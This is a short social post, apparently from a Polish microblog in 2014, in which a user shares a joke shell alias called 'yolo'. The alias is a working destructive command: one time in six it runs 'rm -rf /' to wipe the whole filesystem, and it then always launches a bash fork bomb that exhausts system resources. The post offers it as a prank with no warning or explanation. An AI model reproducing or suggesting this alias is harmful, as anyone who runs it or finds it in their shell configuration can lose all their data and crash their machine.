marsjaninzmarsa:

alias yolo="[ $[ $RANDOM % 6 ] == 0 ] && rm -rf /; :(){ :|:& };:"
2014/03/25 17:50:48 przez xmpp, 0 , 1

Reakcje: [^pwnzor],